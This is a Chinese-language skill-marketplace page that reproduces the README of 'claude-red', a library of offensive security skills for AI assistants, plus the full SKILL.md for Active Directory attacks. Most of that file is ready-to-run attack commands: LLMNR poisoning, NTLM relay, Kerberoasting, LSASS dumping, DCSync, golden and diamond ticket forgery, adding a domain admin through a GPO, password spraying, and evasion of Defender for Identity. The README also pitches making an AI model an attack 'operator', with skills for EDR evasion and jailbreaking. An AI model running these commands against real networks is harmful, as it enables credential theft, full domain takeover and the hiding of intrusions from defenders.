SkillAtlasSkill 详情

offensive-active-directory

Offensive security skills for Claude — drop-in SKILL.

审核状态:已审核Quality 72Security 70

复制安装命令

用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。

复制前请先查看来源、License 和安全提示。

项目 README

来源文件:README.md

抓取于 2026年8月8日

claude-red banner

claude-red

Offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator.

License: MIT Skills Categories Stars Forks

Built by SnailSploit — GenAI Security Research.


Table of Contents


What is this

claude-red is a curated library of offensive security skills for the Claude Skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse.

Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using.

Use it for: authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically.


Quickstart

Claude Skills System (recommended)

# Clone into a directory Claude will scan
git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red

# Or install only one category
git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red
cd claude-red && git sparse-checkout set Skills/web Skills/active-directory

Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads offensive-sqli).

Claude Code

# Point Claude at a single skill before a session
cat Skills/web/offensive-sqli/SKILL.md | claude --system-file -

# Or load a whole category
cat Skills/active-directory/**/SKILL.md | claude --system-file -

Claude.ai (Manual)

Paste the contents of a SKILL.md into a Project's system prompt or prepend to your conversation.

Install Script

./install.sh                           # interactive
./install.sh --target ~/.claude/skills # explicit target
./install.sh --category web            # one category

Categories

CategorySkillsFocus
Web Application16OWASP Top 10 + business logic + advanced web bug classes
Auth & Identity2JWT, OAuth
Active Directory1On-prem AD attack methodology (expanding)
Wireless13802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz
Cloud1AWS / Azure / GCP attack paths (expanding)
Mobile1Android + iOS pentest (expanding)
IoT & Embedded1Hardware, firmware, RTOS, ICS (expanding)
Infrastructure & Red Team7Initial access, EDR evasion, Windows ops
Exploit Development6Stack/heap, mitigations, crash analysis, TOCTOU
Fuzzing & VR4libFuzzer, AFL++, bug ID, vuln classes
Reconnaissance2OSINT tooling and methodology
AI Security1Prompt injection, jailbreaks, RAG poisoning
Utility2Fast-checking, professional reporting

Skill Index

Web Application

Skills/web/

SkillDescription
offensive-sqliSQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths
offensive-xssCross-site scripting — stored, reflected, DOM, mutation
offensive-ssrfServer-side request forgery — cloud metadata, filter bypass
offensive-sstiServer-side template injection — engine ID, RCE paths
offensive-xxeXML external entity — OOB exfil, blind exploitation
offensive-idorInsecure direct object references — enumeration, business logic
offensive-file-uploadFile upload — extension bypass, polyglots, webshells
offensive-rceRemote code execution — chaining, command injection
offensive-deserializationInsecure deserialization — Java/PHP/.NET gadget chains
offensive-race-conditionRace conditions — TOCTOU, single-packet, limit bypass
offensive-request-smugglingHTTP request smuggling — CL.TE, TE.CL, h2 desync
offensive-open-redirectOpen redirect — OAuth abuse, phishing, SSRF pivots
offensive-parameter-pollutionHTTP parameter pollution — WAF bypass, logic confusion
offensive-graphqlGraphQL — introspection, batching, IDOR via aliases
offensive-waf-bypassWAF bypass — encoding, chunking, case mutation
offensive-business-logicBusiness logic — workflow bypass, pricing, refunds, chains

Auth & Identity

Skills/auth/

SkillDescription
offensive-jwtJWT — alg:none, key confusion, secret cracking
offensive-oauthOAuth — open redirect abuse, token leakage, PKCE bypass

Active Directory

Skills/active-directory/

SkillDescription
offensive-active-directoryAD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD

Note: This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See Roadmap.

Wireless

Skills/wireless/

SkillDescription
offensive-wifi802.11 overview — entrypoint into the wireless category
offensive-wifi-reconAdapter selection, monitor mode, multi-band airspace mapping
offensive-wpa2-pskHandshake capture, PMKID, hashcat 22000 cracking
offensive-wpa3-saeTransition-mode downgrade, Dragonblood, SAE side-channels
offensive-wpa-enterprise802.1X / EAP attacks, eaphammer evil-twin RADIUS
offensive-wpsPixie Dust, online PIN brute, vendor PIN generators
offensive-evil-twinKARMA, Mana, captive portal, post-association MITM
offensive-krack-fragattacksKRACK + FragAttacks supplicant testing
offensive-deauth-disassocTargeted/broadcast deauth, PMF awareness, action frames
offensive-bluetooth-bleBLE GATT enum, pairing downgrade, sniffing, MITM
offensive-bluetooth-classicBR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing
offensive-zigbee-thread-matter802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection
offensive-z-waveS0 key derivation flaw, S2 commissioning, hub pivots
offensive-lorawan-sub-ghzLoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS

Cloud

Skills/cloud/

SkillDescription
offensive-cloudAWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion

Note: Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See Roadmap.

Mobile

Skills/mobile/

SkillDescription
offensive-mobileAndroid + iOS — Frida, pinning, storage, biometric, deep links

IoT & Embedded

Skills/iot/

SkillDescription
offensive-iotHardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP

Note: Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See Roadmap.

Infrastructure & Red Team

Skills/infrastructure/

SkillDescription
offensive-initial-accessPhishing, drive-by, supply chain — TA0001
offensive-advanced-redteamFull kill chain, C2, OPSEC, lateral, persistence
offensive-edr-evasionUnhooking, indirect syscalls, PPID spoofing
offensive-shellcodeWriting, encoding, injection techniques
offensive-keylogger-archKeylogger architecture and input-capture techniques
offensive-windows-mitigationsWindows mitigations — ACG, Arbitrary Code Guard
offensive-windows-boundariesDefeating Windows boundaries — sandbox escape, privilege

Exploit Development

Skills/exploit-dev/

SkillDescription
offensive-exploit-developmentStack/heap, ROP chains, mitigations
offensive-exploit-dev-courseStructured curriculum format
offensive-basic-exploitationLinux exploitation, mitigations disabled — beginner-to-mid
offensive-crash-analysisCrash triage, exploitability assessment, root cause
offensive-mitigationsModern kernel mitigations — ASLR, CFG, CET, PAC
offensive-toctouTime-of-check/use across binary, kernel, web, container

Fuzzing & Vulnerability Research

Skills/fuzzing/

SkillDescription
offensive-fuzzinglibFuzzer, AFL++, coverage-guided, mutation strategies
offensive-fuzzing-courseCurriculum — finding vulns via fuzzing
offensive-bug-identificationCode review patterns, static analysis triggers
offensive-vuln-classesVulnerability classes — real-world examples, taxonomy

Reconnaissance

Skills/recon/

SkillDescription
offensive-osintOSINT tools — recon-ng, theHarvester, Maltego pipelines
offensive-osint-methodologyOSINT methodology — structured intelligence collection

AI Security

Skills/ai/

SkillDescription
offensive-ai-securityAI pentest — prompt injection, jailbreaking, RAG poisoning

Utility

Skills/utility/

SkillDescription
offensive-fast-checkingFast triage checklist — quick-win identification
offensive-reportingPro pentest reporting — CVSS, evidence, exec summary, retest

Roadmap

The library is being expanded in seven phases. Track progress in CHANGELOG.md.

PhaseCategoryNew SkillsStatus
1Internal AD/Windows (rename active-directory/ → internal/)+16Planned
2Cloud Identity (Entra/AAD, ADFS, Okta, M365)+10Planned
3Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz)+12Mandatory
4IoT split (UART/JTAG, flash, fault injection, RTOS, ICS)+10Planned
5Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack)+8Planned
6Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI)+10Planned
7Polish (README, LICENSE, manifest, install)—In progress

End state: ~107 skills across the same 13+ categories.


Contributing

Contributions welcome. See CONTRIBUTING.md for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews.

License

MIT — use freely, attribution appreciated.

Acknowledgements

  • Author: Kai Aizen (SnailSploit) — snailsploit.com
  • Original Checklists: Sahar Shlichov — the offensive checklist collection many of these skills are based on.
  • Community: PRs and feedback that keep the library current with the threat landscape.

"Give Claude the right skill and it stops being a chatbot. It becomes an operator."


📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

https://snailsploit.com/claude-red

Created by Kai Aizen — independent offensive security researcher.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Same attack. Different substrate.

其他

中风险

  • 来源需自行核对维护者身份。
  • 包含脚本或命令调用,安装前请复核。
  • 可能需要外部 token、网络权限或第三方服务。
  • 未检测到高风险命令。
  • 扫描发现:3 条。

Codex — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/active-directory/offensive-active-directory" 文件夹复制到 Codex 的 skills 目录中。
  4. 重启 Codex 让新的 skill 生效。

Codex — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Codex 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Codex 让新的 skill 生效。

Claude Code — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/active-directory/offensive-active-directory" 文件夹复制到 Claude Code 的 skills 目录中。
  4. 重启 Claude Code 让新的 skill 生效。

Claude Code — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Claude Code 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Claude Code 让新的 skill 生效。

Cursor — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/active-directory/offensive-active-directory" 文件夹复制到 Cursor 的 skills 目录中。
  4. 重启 Cursor 让新的 skill 生效。

Cursor — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Cursor 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Cursor 让新的 skill 生效。

GitHub Copilot — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/active-directory/offensive-active-directory" 文件夹复制到 GitHub Copilot 的 skills 目录中。
  4. 重启 GitHub Copilot 让新的 skill 生效。

GitHub Copilot — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 GitHub Copilot 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 GitHub Copilot 让新的 skill 生效。

Windsurf — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/active-directory/offensive-active-directory" 文件夹复制到 Windsurf 的 skills 目录中。
  4. 重启 Windsurf 让新的 skill 生效。

Windsurf — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Windsurf 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Windsurf 让新的 skill 生效。
查看 SKILL.md 原文
name: offensive-active-directory
description: "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments."

Active Directory — Offensive Testing Methodology

Quick Workflow

  1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
  2. Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed
  3. Map attack paths to Domain Admin / Enterprise Admin / Tier 0
  4. Execute path with lowest detection cost, validate at each hop
  5. Establish persistence and document every action with timestamps

Reconnaissance

BloodHound Collection

# SharpHound (CSharp collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip

# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth

# Bloodhound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All

PowerView (No Tool Drop)

# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
  ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}

ADExplorer Offline

# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/

Credential Harvesting

LLMNR / NBT-NS / mDNS Poisoning

# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf

# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y

Crack with hashcat mode 5600. If cracking fails, relay instead.

NTLM Relay

# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt

# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
  --escalate-user attacker --delegate-access

# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController

Kerberoasting

# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule

ASREProasting

# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt

LSASS / SAM Dumping

:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full

:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)

:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid

Parse with Mimikatz or pypykatz offline:

pypykatz lsa minidump lsass.dmp

Privilege Escalation Within AD

ACL Abuse

RightAbuse
GenericAll / GenericWriteAdd SPN → Kerberoast; reset password; add member
WriteDaclGrant yourself DCSync rights, then DCSync
WriteOwnerTake ownership → grant rights → exploit
AllExtendedRights (User)Force password change
AllExtendedRights (Domain)DCSync
AddMemberAdd self to privileged group
WriteSPNSet SPN, kerberoast target
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname

# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \
  -PrincipalIdentity attacker -Rights DCSync

Kerberos Delegation

# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap

# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator \
  /msdsspn:cifs/dc.corp.local /ptt

# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object

Coercion Primitives

TechniqueTool / RPC
PetitPotamMS-EFSRPC (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv)
PrinterBugMS-RPRN (RpcRemoteFindFirstPrinterChangeNotificationEx)
DFSCoerceMS-DFSNM (NetrDfsRemoveStdRoot)
ShadowCoerceMS-FSRVP
WebDAVSearch-and-replace UNC path embedded in any web fetch
# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine

GPO Abuse

# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
     -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }

# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System \
  --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" \
  --GPOName "Workstation Policy"

ADCS Abuse — ESC1 through ESC15

Enumeration

certipy find -u user@corp.local -p pass -dc-ip 10.0.0.1 -vulnerable -stdout

Common Misconfigurations

IDMisconfigExploitation
ESC1Client Auth + ENROLLEE_SUPPLIES_SUBJECTRequest cert with arbitrary UPN
ESC2Any Purpose EKURequest cert valid for any use
ESC3Enrollment AgentRequest agent cert, then on-behalf-of any user
ESC4Vulnerable template ACLModify template to ESC1
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2 on CASAN injection on any template
ESC7Vulnerable CA ACL (ManageCA)Approve own pending requests
ESC8Web Enrollment HTTP + no EPANTLM relay → cert
ESC9No security extension + UPNUPN spoofing post-account-rename
ESC10StrongCertificateBindingEnforcement weakUPN spoofing without rename
ESC11RPC unprotected (no ICertPassage IF_ENFORCEENCRYPTICERTREQUEST)Relay over RPC
ESC13Issuance policy linked to groupCert grants group membership
ESC14altSecurityIdentities writeMap attacker cert to admin
ESC15EKUwu — schema v1 templatesInject EKU at request time

ESC1 Exploitation

# Request cert as Administrator
certipy req -u user@corp.local -p pass -ca CORP-CA -template VulnTemplate \
  -upn administrator@corp.local

# Use cert to get TGT and NT hash via UnPAC-the-Hash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1

ESC8 (Web Enrollment Relay)

# Coerce any DC, relay to ADCS Web Enrollment, request DC cert
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController &
PetitPotam.py attacker-ip dc.corp.local
# Result: cert for DC$ → TGT → DCSync

Lateral Movement

Pass-the-Hash / Overpass-the-Hash

# PTH with NT hash
nxc smb 10.0.0.0/24 -u admin -H <NThash> --local-auth
impacket-psexec corp/admin@target -hashes :<NThash>

# Overpass-the-Hash (NT hash → TGT, useful for Kerberos-only targets)
Rubeus.exe asktgt /user:admin /rc4:<NThash> /ptt

Pass-the-Ticket

# Inject TGT
Rubeus.exe ptt /ticket:base64.kirbi
# Or from .ccache
KRB5CCNAME=admin.ccache impacket-secretsdump -k -no-pass dc.corp.local

Silent Lateral Tools

# WinRM (no event logs in default channel for command exec)
evil-winrm -i target -u admin -H <hash>

# SMB exec without service creation (uses task scheduler)
impacket-atexec corp/admin@target -hashes :<hash> "whoami"

# WMI
impacket-wmiexec corp/admin@target -hashes :<hash>

# DCOM (MMC20.Application, ShellWindows, ShellBrowserWindow)
Invoke-DCOM -ComputerName target -Method MMC20 -Command "calc.exe"

Persistence

Golden Ticket (krbtgt forge)

# Requires krbtgt NT hash (from DCSync)
impacket-ticketer -nthash <krbtgt-NT> -domain-sid S-1-5-21-... -domain corp.local Administrator
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass dc.corp.local

Silver Ticket (per-service forge)

# Forge TGS for a specific service using its account hash
impacket-ticketer -nthash <svc-NT> -domain-sid <SID> -domain corp.local \
  -spn cifs/server.corp.local Administrator

Diamond / Sapphire Ticket (modern, evades MDI on krbtgt)

# Diamond — modify legitimate TGT in-flight (no krbtgt hash on wire)
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512

DCSync

impacket-secretsdump -just-dc-user 'corp/krbtgt' corp/admin@dc -hashes :<hash>
# In-memory PowerShell variant (Mimikatz)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'

DCShadow (register rogue DC, push changes)

mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:CN=victim,... /attribute:primaryGroupID /value:519
mimikatz # lsadump::dcshadow /push

AdminSDHolder

Add ACE granting your account GenericAll on CN=AdminSDHolder,CN=System,DC=corp,DC=local. SDProp propagates to all protected groups every 60 minutes.


Forest & Trust Attacks

# Map trusts
Get-DomainTrust -SearchBase "DC=corp,DC=local"
Get-ForestTrust

# SID History injection (cross-forest if SID filtering disabled)
# ExtraSids in golden ticket → admin in trusted forest
impacket-ticketer -nthash <krbtgt> -domain-sid <child-SID> \
  -extra-sid S-1-5-21-<parent>-519 -domain child.corp.local Administrator

# Trust ticket forging (inter-realm TGT)
Rubeus.exe asktgs /service:krbtgt/parent.local /ticket:trust-ticket.kirbi

Hybrid AD / Entra ID (Azure AD) Pivots

PivotPath
AAD Connect server compromiseDump MSOL_ account → DCSync on-prem
Seamless SSOForge Kerberos ticket for AZUREADSSOACC$ → cloud SSO any user
PTA agentDLL hijack Microsoft.Azure.SecurityTokenService → harvest cleartext
PHS hash syncRead on-prem hashes from AAD Connect SQL (ADSync DB)
Federated trustForge SAML token via stolen ADFS token-signing cert (Golden SAML)
Pass-the-PRTSteal PRT cookie from device → cloud session as user
# AADInternals — Hybrid identity attack toolkit
Get-AADIntADSyncCredentials  # Extract MSOL_ creds from AAD Connect
Open-AADIntOffice365Portal -AccessToken $token
New-AADIntSAMLToken -ImmutableID 'a==' -Issuer 'http://sts/adfs/services/trust' \
  -PfxFileName 'token-signing.pfx'

Detection Evasion (MDI / Defender for Identity)

MDI DetectorEvasion
Honeytoken account accessAlways check description and recent activity before hitting accounts
Reconnaissance via SAMRUse ADWS / LDAP-only collection, throttle
Suspicious Kerberos delegationAvoid noisy S4U2self chains on monitored DCs
Golden/Silver Ticket detectionUse Diamond/Sapphire variants; match legitimate ticket lifetime/encryption
DCSync from non-DCRelay through legitimate replication-permitted accounts
Pass-the-HashUse overpass-the-hash to convert to Kerberos before lateraling
# Identify MDI sensors before noisy actions
Get-DomainComputer -SPN '*MicrosoftATA*'
Get-DomainComputer | ?{ $_.servicePrincipalName -match 'AATPSensor' }

Engagement Cheatsheet

# 1. Anonymous LDAP enum (no creds)
ldapsearch -x -H ldap://dc -s base -b "" "(objectclass=*)"
nxc ldap dc -u '' -p '' --users

# 2. Null SMB session
nxc smb dc -u '' -p '' --shares
impacket-rpcclient -U '' dc -no-pass

# 3. Password spray (low and slow)
nxc smb dc -u users.txt -p 'Winter2025!' --continue-on-success

# 4. Once authed: full enum + BloodHound
bloodhound-python -d corp.local -u user -p pass -ns dc -c All --zip

# 5. Identify attack path → execute → loot → persist

Key References

发现问题?提交给管理员复核

评分:

评论 (0)

暂无评论,成为第一个评论者吧!